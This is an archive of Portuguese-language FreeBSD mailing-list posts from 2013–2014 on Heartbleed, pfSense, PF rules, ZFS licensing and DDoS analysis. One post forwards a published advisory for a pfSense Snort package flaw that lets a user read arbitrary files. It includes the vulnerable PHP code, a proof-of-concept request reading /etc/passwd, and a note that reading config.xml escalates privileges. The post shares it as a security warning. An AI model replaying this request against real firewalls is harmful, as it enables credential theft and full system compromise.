2014-04-08 18:24 GMT-03:00 Renato Botelho rbga...@gmail.com: Forwarded Message From: FreeBSD Security Officer security-offi...@freebsd.org Reply-to: freebsd-secur...@freebsd.org To: FreeBSD Security Advisories security-advisor...@freebsd.org Subject: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug Date: Tue, 8 Apr 2014 20:42:29 GMT Hi, This is a heads-up for the OpenSSL Heartbleed bug. FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40 UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2, r350549). FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head, r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08 18:27:46 UTC (releng/10.0, r264267). The update is available with freebsd-update. All other supported FreeBSD branches are not affected by this issue. Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já deu para perceber o tamanho do estrago. Conseguiram capturar diversas senhas de usuários do Yahoo, etc. Estava conferindo a versão do OpenSSL no meu sistema: % openssl version -v OpenSSL 0.9.8x 10 May 2012 De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez tenha outras falhas, não sei). Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4] explica o bug no código. Para testar se seu site está vulnerável temos esses: [5] [6] [7] Aparentemente o SSH não é vulnerável [8] [1] http://beta.slashdot.org/story/200451 [2] http://heartbleed.com/ [3] http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1 [4] http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html [5] http://possible.lv/tools/hb/ [6] http://filippo.io/Heartbleed/ [7] http://rehmann.co/projects/heartbeat/ [8] Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]
Em 9 de abril de 2014 09:04, Welkson Renny de Medeiros welk...@gmail.comescreveu: 2014-04-08 18:24 GMT-03:00 Renato Botelho rbga...@gmail.com: Forwarded Message From: FreeBSD Security Officer security-offi...@freebsd.org Reply-to: freebsd-secur...@freebsd.org To: FreeBSD Security Advisories security-advisor...@freebsd.org Subject: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug Date: Tue, 8 Apr 2014 20:42:29 GMT Hi, This is a heads-up for the OpenSSL Heartbleed bug. FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40 UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2, r350549). FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head, r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08 18:27:46 UTC (releng/10.0, r264267). The update is available with freebsd-update. All other supported FreeBSD branches are not affected by this issue. Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já deu para perceber o tamanho do estrago. Conseguiram capturar diversas senhas de usuários do Yahoo, etc. Estava conferindo a versão do OpenSSL no meu sistema: % openssl version -v OpenSSL 0.9.8x 10 May 2012 De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez tenha outras falhas, não sei). Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4] explica o bug no código. Para testar se seu site está vulnerável temos esses: [5] [6] [7] Aparentemente o SSH não é vulnerável [8] [1] http://beta.slashdot.org/story/200451 [2] http://heartbleed.com/ [3] http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1 [4] http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html [5] http://possible.lv/tools/hb/ [6] http://filippo.io/Heartbleed/ [7] http://rehmann.co/projects/heartbeat/ [8] Welkson Esqueci do [8] http://undeadly.org/cgi?action=articlesid=20140408063423 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Tutorial instalação FreeBSD 10 - bem básico
Em 9 de abril de 2014 11:21, Eduardo Schoedler lis...@esds.com.brescreveu: Correção: resolveram o problema do PF com SMP no OpenBSD? Resposta: Will multiple processors help? PF will only use one processor, so multiple processors (or multiple cores) WILL NOT improve PF performance. Portanto, cuidado para que você for usá-lo. [1] http://www.openbsd.dk/faq/pf/perf.html -- Eduardo Schoedler Quase que cometo o pecado de perguntar sem antes procurar no Google rsrsrs: http://lists.freebsd.org/pipermail/freebsd-pf/2012-June/006643.html Aparentemente no FreeBSD já foi implementado, certo? Pelo que vi, estará no current do FreeBSD10: https://wiki.freebsd.org/WhatsNew/FreeBSD10 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OFF dúvida phpPgAdmin (recovery password)
2014-02-18 14:00 GMT-03:00 Denis Granato denisgran...@gmail.com: Boa tarde a todos, Esqueci a senha do phpPgAdmin para gerenciar meu banco postgresql. Como posso recuperar? Obrigado A senha na verdade não fica no PGAdmin, e sim no próprio Postgres. Se tiver acesso ao servidor do banco basta modificar o pg_hba.conf colocando a conexão em modo trust, e em seguida resetar a senha usando psql como mostrado abaixo: http://scratching.psybermonkey.net/2009/06/postgresql-how-to-reset-user-name.html Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Phpvirtualbox
Em 13 de fevereiro de 2014 09:04, Cleber Medina clebermed...@gmail.comescreveu: Em 13/02/2014 09:33, Otavio Augusto escreveu: Qual mensagem de erro nos logs do apache ? Em 11 de fevereiro de 2014 22:12, Cleber Medina clebermed...@gmail.com escreveu: Hoje instalei o phpvirtualbox via ports no 10... Fiz os ajustes de usuário apache etc...mas não exibe a interface web Alguem tem alguma dica Tb não achei o binario VboxManager nessa versão.. Obrigado Bem estranho, geralmente quando ocorre esses problemas de página em branco é registrado uma mensagem de erro em: tail -f /var/log/httpd-error.log Tenta colocar um E_ALL no error_reporting (veja também display_errors e display_startup_errors no seu php.ini (/usr/local/etc/php.ini). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
Senhores, boa tarde! Alerta pra quem usa o package Snort no pfSense. Welkson ... ## # _ ___ _ _ _ _ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_\___/|_| \_|\|\/_/ \_\_| # # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE) # Date: 25/01/2014 (0-day) # Exploit Author: @u0x (Pichaya Morimoto) # Software Link: www.pfsense.org # Category: Local File Inclusion (LFI) Privilege Escalation # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2 # # pfSense firewall/router distribution description : == pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. Attack Scenario == Authenticated users with only permission to access some packages in web gui (a.k.a. webConfigurator) will be able to escalate themselves to other privileged admin by reading /conf/config.xml file through bugs (i.e. Snort LFI), result in fully compromise the pfSense. This attack abuse the user privilege scheme with some of official packages (System Package Manager) * Session Hijacking also possible to steal less privileged user sessions to perform this trick due to http admin by default webConfigurator. Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion Vulnerability Vulnerable file: == snort_log_view.php [+] Checksum SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c MD5: cd767e46a4e9e09ede7fd26560e37f14 Vulnerable Source Code : == http://www.pfsense.com/packages/config/snort/snort_log_view.php https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php ...(deducted)... $contents = ''; // Read the contents of the argument passed to us. // Is it a fully qualified path and file? if (file_exists($_GET['logfile'])) $contents = file_get_contents($_GET['logfile']); // It is not something we can display, so print an error. else $contents = gettext(\n\nERROR -- File: {$_GET['logfile']} not found!); $pgtitle = array(gettext(Snort), gettext(Log File Viewer)); ? ...(deducted)... textarea style=width:100%; height:100%; readonly wrap=off rows=33 cols=80 name=code2?=$contents;?/textarea ...(deducted)... Proof of Concept 1 : Arbitrary File Inclusion == GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1 Host: firewall1.pentestlab1:1337 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: th,en-US;q=0.8,en;q=0.6 Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083 HTTP/1.1 200 OK Expires: Mon, 27 Jan 2014 07:25:10 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=18 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT X-Frame-Options: SAMEORIGIN Pragma: no-cache Content-type: text/html Transfer-Encoding: chunked Date: Sat, 25 Jan 2014 05:25:10 GMT Server: lighttpd/1.4.32 ...(deducted)... td colspan=2 valign=top class=label div style=background: #ee; width:100%; height:100%; id=textareaitem!-- NOTE: The opening *and* the closing textarea tag must be on the same line. -- textarea style=width:100%; height:100%; readonly wrap=off rows=33 cols=80 name=code2root:*:0:0:Charlie :/root:/bin/sh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System :/:/usr/sbin/nologin ...(deducted)... havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
Re: [FUG-BR] Bloqueio 443 apenas alguns sites.
Em 20 de janeiro de 2014 14:14, Anker Projeto projetoan...@gmail.comescreveu: Boa tarde pessoal, hoje tenho rodando squid e estou tendo problemas com o HTTPS, quero bloquear alguns sites com https exceto alguns. uso o pf e estou tentando algo desse jeito , alguém pode me ajudar ? block in log on $IF_LAN proto {tcp, udp} from $REDE_LAN to port 443 !BANCOS dentro da tabela bancos eu coloqueis os ips dos bancos . Obrigado Anker, bom dia! Não tenho como testar agora, mas acredito que seria algo assim: block in log on $IF_LAN proto tcp from $REDE_LAN to !BANCOS port 443 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] ip de um dominio
Em 20 de janeiro de 2014 13:17, Renato Botelho rbga...@gmail.com escreveu: On 20-01-2014 13:33, Cleber Medina wrote: Boa tarde, Qual é a url daquele site que mostra todos os ips referentes a um dominio? Eu não sei qual a URL que você tá falando, mas vou te falar o que eu faço quando quero descobrir o range de IPs de um determinado site. Ele deve está se referindo a esse: http://bgp.he.net/ Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [FreeBSD-Announce] FreeBSD 10.0-RELEASE Now Available
2014/1/20 Luiz Gustavo S. Costa luizgust...@luizgustavo.pro.br Uia ... que noticia boa ! -- Forwarded message -- From: Glen Barber g...@freebsd.org Date: 2014/1/20 Instalar em uma VM pra aprender a usar esse tal pkg =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] PPTP + PFSence
Em 17 de janeiro de 2014 10:16, Lucas Martinez corumb...@gmail.comescreveu: Leo, obrigado ! Segui seu material deixei tudo Any e á mesma coisa. Enable PPTP server , configurei as regras no pfsence Tambem acompanhei esse material: http://www.vivaolinux.com.br/artigo/Criando-VPN-com-o-PFSense?pagina=1verifiquei em mais 2 materiais ( tudo padrão ) O problema do PPTP é o GRE (protocolo 47), alguns provedores bloqueiam... alguns roteadores não conseguem repassar o pacote, etc. Viu algo referente a isso? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] PPTP + PFSence
Em 17 de janeiro de 2014 13:39, Welkson Renny de Medeiros welk...@gmail.com escreveu: A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já o link ligado ao pfSense não. Enfim, precisaria de mais informações, screenshots das regras do firewall, detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense, se o link é ligado diretamente ao pfSense ou se passa por um roteador antes, etc.). Mais alguns links: https://doc.pfsense.org/index.php/PPTP_VPN https://doc.pfsense.org/index.php/GRE_Interfaces https://doc.pfsense.org/index.php/PPTP_VPN Welkson Último link foi igual, o correto seria esse: http://devwiki.pfsense.org/PPTPTroubleShooting Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] PPTP + PFSence
Em 17 de janeiro de 2014 10:27, Lucas Martinez corumb...@gmail.comescreveu: Questão é se conectar diretamente no notebook , Conecta. No pfsence está tudo liberado de dentro para fora, apenas o pptp não funciona. A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já o link ligado ao pfSense não. Enfim, precisaria de mais informações, screenshots das regras do firewall, detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense, se o link é ligado diretamente ao pfSense ou se passa por um roteador antes, etc.). Mais alguns links: https://doc.pfsense.org/index.php/PPTP_VPN https://doc.pfsense.org/index.php/GRE_Interfaces https://doc.pfsense.org/index.php/PPTP_VPN Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 10.0 RC3 disponível para download
Em 27 de dezembro de 2013 10:11, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Existe uma lenda urbana que diz que as versões pares são sempre as melhores hehehehe Até agora eu não tenho o que reclamar. []'s Gondim Ouvi falar dessa lenda na época do Delphi... as versões ímpares sempre eram boas... as pares, só dor de cabeça =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] FreeBSD no Google Cloud Plataform (GCE)
Ótima notícia: http://googlecloudplatform.blogspot.com.br/2013/12/google-compute-engine-is-now-generally-available.html Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] É verdade que ninguém tentou desenvolver um sistema operacional livre na década de 1980, exceto o Projeto GNU e (mais tarde) Berkeley CSRG, que havia sido solicitado especificamente pelo
Em 9 de dezembro de 2013 15:11, João Mancy joao...@gmail.com escreveu: Tártaro dois é a divisão binária de Tártaro Um , que veio do Jorge ??? Interessante seu ciclo reprodutor, uma espécie de downgrade das Amebas. Jorge ataca novamente =) Não alimente trolls galera. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC] FreeBSD on amazon aws - existe a opção ?
Em 18 de novembro de 2013 09:46, Leonardo Augusto lalin...@gmail.comescreveu: Pessoal, Alguém já conseguiu ou sabe se é possível utilizar freebsd nos serviços da amazon ? Vi um site com um monte de imagens de freebsd, mas no painel da conta de um amigo no aws, só tem opções de linux. []'s Bom dia. Colin Percival mantém essas imagens do BSD. Pelo que sei funcionam perfeitamente (o tarsnap usa BSD na Amazon), mas não são suportadas oficialmente pela Amazon. https://aws.amazon.com/marketplace/pp/B00AA25MLK/ http://www.daemonology.net/freebsd-on-ec2/ Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Certificado SSL no SQUID
Em 30 de outubro de 2013 09:30, Marcus Vinicius. surfi...@gmail.comescreveu: Isso mesmo, Neerlan. Em 30 de outubro de 2013 10:24, Neerlan Amorim neer...@gmail.com escreveu: http://wiki.squid-cache.org/Features/SslBump Squid-in-the-middle decryption and encryption of straight CONNECT and transparently redirected SSL traffic, using configurable CA certificates. While decrypted, the traffic can be analyzed, blocked, or adapted using regular Squid features such as ICAP and eCAP. É o que eu estou pensando? Possibilidade de fazer cache desse conteúdo? No meu caso nem me preocupo tanto com o cache, e sim com a possibilidade de bloquear tráfego https usando proxy transparente. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS
2013/9/17 Marcelo Gondim gon...@bsdinfo.com.br Em 17/09/13 21:33, Marcos Vinicios Silva dos Santos escreveu: Pergunta de Newbie: Será que haverá muita diferença do ZFS da Oracle para o OpenZFS? Será que vai ser possivel implementar todas as evoluções do ZFS da Oracle? Ainda estou lendo o site, mas confesso que não encontrei nada sobre o licenciamento. Esse projeto seria um fork do ZFS ou reescrito do zero? Se for um fork, a licença continuará CDDL ou será BSD? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS
Em 18 de setembro de 2013 08:30, Renato Botelho rbga...@gmail.comescreveu: De acordo com o site [1]: ZFS source code is copyright various contributors, and available under the CDDL open-source license. [1] http://www.open-zfs.org/wiki/About_OpenZFS []s -- Renato Botelho Garga, Eu até vi esse link, mas como falava sobre ZFS e não sobre Open-ZFS pensei que se tratava da versão da Oracle. A licença continuando como CDDL não nos deixará da mesma forma na mão da Oracle? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS
Em 18 de setembro de 2013 08:55, Renato Botelho rbga...@gmail.comescreveu: Eu não manjo muito de licenças, mas o que tem de errado com a licença CDDL? Eu acredito que deva ser um fork da última versão open source do ZFS da Sun/Oracle, então não tem como mudar a licença. -- Renato Botelho Eu também não... Mas lembro que na época que portaram ZFS para BSD houve bastante discussão quanto a isso. Acredito que seja o mesmo problema que ocorre no Linux (incompatibilidade de licenças): http://arstechnica.com/information-technology/2010/06/uptake-of-native-linux-zfs-port-hampered-by-license-conflict/ Mas enfim, que venha pra somar. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS
Em 18 de setembro de 2013 09:19, Antônio Pessoa atnpes...@gmail.comescreveu: Pelo que me lembre, ela é baseada na Mozilla Public License 1.1 e considerada incompatível com a GPL. Mas isso não chega a ser um problema, talvez apenas para o Linux. -- Atenciosamente, Antônio Pessoa Lendo mais um pouco encontrei esse link: http://www.dirmgr.com/blog/2007/12/2/why-the-dislike-for-cddl.html O primeiro comentário do link informa o seguinte: This is not directed at you, more at the framers of the CDDL (and by extension, the MPL). The CDDL/MPL are incompatible because the CDDL/MPL require you to distribute the source *only* under the CDDL/MPL. This isn't a problem when mixing code with other file-based licenses like BSD-alikes, but means it doesn't play nice with entire-work licenses like the GPL (either version). I'd like to see Sun update the CDDL to allow CDDL code to be distributed under the terms of GPLv3, just like GPLv3 allows code under it to be distributed as part of a larger work under the Affero GPL. *goes and writes an email to webmink* Essa parte parece interessante: This isn't a problem when mixing code with other file-based licenses like BSD-alikes, but means it doesn't play nice with entire-work licenses like the GPL (either version). O texto completo da CDDL está aqui: http://opensource.org/licenses/CDDL-1.0 Tem algumas coisas referente a patentes e propriedade intelectual, mas como não manjo nada disso passo a bola para os expert`s de plantão. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Lançamento do pfSense 2.1-RELEASE
Boas novas: http://blog.pfsense.org/?p=712 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Hangout assunto FreeBSD
Em 29 de agosto de 2013 12:11, Luiz Gustavo S. Costa luizgust...@luizgustavo.pro.br escreveu: Olá pessoal, Eu estou querendo montar um Hangout semelhante ao modelo que eu utilizo para o Pfsense abordando algum assunto para FreeBSD. Ele terá um formato de tutorial, mas preciso conhecer a demanda. Inicialmente penso nos seguintes assuntos: - ZFS - Jail - Packet Filter / IPFW - build world build kernel - 10-CURRENT O que acham ? se puderem opinar e/ou indicar outro assunto (claro, eu teria que avaliar o meu conhecimento em relação ao assunto proposto). No aguardo dos amigos. Abraços -- Luiz Gustavo Costa (Powered by BSD) ZFS avançado seria uma boa. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Sobre um site de críticas ao BSD
Em 22 de agosto de 2013 02:21, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Nossa aquele Jorge Luis não pode ver esse blog não, senão a gente tá lascado HaHaHAhAhAhAh Se o autor desse tópico não for Jorge Luis usando outro nome k https://www.google.com.br/search?q=Johann+Peter+Dirichlet Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Sobre um site de críticas ao BSD
Em 22 de agosto de 2013 09:34, Sergio Augusto Vladisauskis sergi...@gmail.com escreveu: Linux is more portable then NetBSD aham... -- Sergio Augusto Vladisauskis PC-BSD is spyware, que tosco... só porque os caras usam bsdstats... tempos atrás fizemos até uma campanha por aqui para que todos instalassem para que o BR se destacasse no ranking mundial de uso do BSD. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [off-topic] Palestra sobre como é a estrutura do Facebook para suportar 1 bilhão de usuários
Em 20 de agosto de 2013 22:12, Leonardo Augusto lalin...@gmail.comescreveu: Tem no proprio site do face tudo que eles usam. google = facebook infra structure Achei muito ruim o video... a pagina que fala da infra da uma visão muito melhor. Lá fala que a salvação foi o memcache.. e o bigtable.. dentre outros... O hip-hop, compilador de php para C... Esses detalhes que permitem esse absurdo de read/write.. Claro, ficaria melhor se fosse em cima do freebsd :) (é linux que eles usam ?) Facebook usa BigTable? certeza? BigTable é o NoSQL da Google. Provavelmente eles usam Cassandra. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [1/2OFF] MacOS e compatibilidade binária com Linux
Em 14 de agosto de 2013 17:49, Pablo Sánchez phack...@gmail.com escreveu: Caros, Como todos sabem, o MacOS (Darwin) é oriundo do FreeBSD lá na versão 3.0. Nessa época o Free já tinha compatibilidade binária com Linux, instalando o port linux_base. Até hoje isso funciona no FreeBSD de boa (e muitas vezes até com certo ganho de performance). A minha dúvida é: alguém sabe se tal compatibilidade binária foi mantida pela Apple? Basicamente é porque eu preciso executar uma ferramenta que só tem binário para Linux e Windows e não quero fazer isso usando VMs, acho um saco, além de pesado desnecessariamente. E então? Alguém? Hein? Hein? MacOS usa Mach-O, e não ELF... Fiz algumas pesquisas, talvez ajude: http://osxbook.com/software/xbinary/ http://stackoverflow.com/questions/2574912/possiblity-of-loading-executing-elf-files-on-osx http://stackoverflow.com/questions/9439436/is-a-linux-executable-compatible-with-os-x http://unix.stackexchange.com/questions/7874/binary-compatibility-between-mac-os-x-and-linux Apesar do Mac ser baseado em Darwin, aparentemente não tem a compatibilidade binária com Linux como o FreeBSD tem. Foi o que entendi lendo os links. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [1/2 OFF] PostgreSQL no FreeBSD ao invés de Linux
Em 9 de agosto de 2013 08:09, Juliano Atanazio juliano.l...@gmail.comescreveu: Em 8 de agosto de 2013 17:48, Danilo Egea daniloe...@yahoo.com.br escreveu: Então, Danilo. A intenção do meu post não foi somente em termos de performance que estou preocupado do PostgreSQL no FreeBSD, mas também saber o que o FreeBSD pode me oferecer de vantajoso para manter o PostgreSQL nele. É um pouco antigo, mas talvez ajude: http://freebsdfoundation.blogspot.com.br/2010/06/freebsd-and-postgresql.html Realmente o ZFS faz uma diferença enorme (veja o primeiro gráfico e compare com os demais): http://www.unix-experience.fr/2013/2451/ Pelo que lembro alguns dos desenvolvedores do PG usam FreeBSD (não achei referências, mas acho que já comentaram isso por aqui) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Current em produção
Em 9 de agosto de 2013 11:43, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Opa Loos e pessoal, Valeu pela resposta mas a minha pergunta foi mais por curiosidade mesmo. :) Mas seria bom saber se caso precisasse de algo que tivesse somente no current, eu pudesse aproveitar pra algo não crítico. Grande abraço à todos, Gondim Gondim, fugindo um pouco da thread... E aquele problema do PPPOE? Voltou para o Linux? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Ferramenta para análise de DDoS
Em 27 de julho de 2013 20:32, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Grande Welkson, Então, o objetivo é fazer um levantamento rápido pra tentar ver junto à minha fornecedora de link. Tive um problema menor que esse um tempo atrás e consegui resolver tirando o IP de destino do ar. Esse que tive nessa madruga foi um ataque de 2Gbps onde meus 2 links ficaram cheios. :( O que me deixa puto com essas coisas é saber que tem muito servidor aí comprometido por falta de cuidado dos sysadmins. Você ser invadido é uma coisa mas não detectar o problema posteriormente, deixando o servidor servir de agente zumbi são outros quinhentos. Será que o cara não olha em nenhum momento o gráfico de consumo dele mensal? Todo Datacenter te dá isso. Alguns montam o servidor e largam à bangu. Se todos fizessem a sua parte a coisa poderia ser um pouco melhor. :) Vou olhar os links que você passou e também estou aqui na procura. Obrigadão! Verdade Gondim. Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando rodo um portaudit e surge vários pacotes com vulnerabilidades... se o camarada brincar a galera entra mesmo. Um outro dado alarmanete é a quantidade de smartphones comprometidos... muita gente baixa .apk ou .ipa (android e iphone respectivamente) no 4shared e instala sem saber a procedência. Imagina um monte de smartphone usando 4G sendo infectado e participando de botnet? Complicado... Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Ferramenta para análise de DDoS
Em 28 de julho de 2013 12:36, Welkson Renny de Medeiros welk...@gmail.comescreveu: Verdade Gondim. Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando rodo um portaudit e surge vários pacotes com vulnerabilidades... se o camarada brincar a galera entra mesmo. Um outro dado alarmanete é a quantidade de smartphones comprometidos... muita gente baixa .apk ou .ipa (android e iphone respectivamente) no 4shared e instala sem saber a procedência. Imagina um monte de smartphone usando 4G sendo infectado e participando de botnet? Complicado... Welkson Onde tem alarmanete leia alarmante =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Ferramenta para análise de DDoS
Em 27 de julho de 2013 13:37, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Pessoal, Estou procurando alguma ferramenta para que me facilite analisar um ataque DDoS que esteja passando pelo meu router FreeBSD, me permitindo identificar as origens e destino do ataque. Sei que é complicado garantir a origem do ataque mas qualquer coisa já ajuda. Porque se não for pela origem vai pelo destino mesmo. ;) Hoje tenho feito isso com jnettop e tcpdump mas se existir alguma ou algumas outras ferramentas seria interessante. :) []'s Gondim Mestre Gondim, nunca passei por isso, mas pelo que sei não adianta bloquear no firewall, afinal o pacote vai ocupar o meio físico e comprometer a banda... mas fiquei curioso quanto a análise do ataque, fiz algumas pesquisas, encontrei essa ferramenta: http://nfsen.sourceforge.net Screenshots: http://nfsen.sourceforge.net/#mozTocId301830 Já pensou em usar CloudFlare? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF] - Morte do Pedro Madsen
Em 17 de julho de 2013 16:41, Paulo Henrique - BSDs Brasil paulo.rd...@bsd.com.br escreveu: Em 17/07/2013 15:56, mantunes escreveu: Deve ter sido selecionado por irado para trabalhar com ele.. Que fique em paz.. RIP! O Irado tinha uma certa idade, mas o Madsen, se for esse da foto [1], aparentava ser bastante jovem. [1] https://twitter.com/MadsenPedro Descanse em paz! Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Como Bloquear Skype
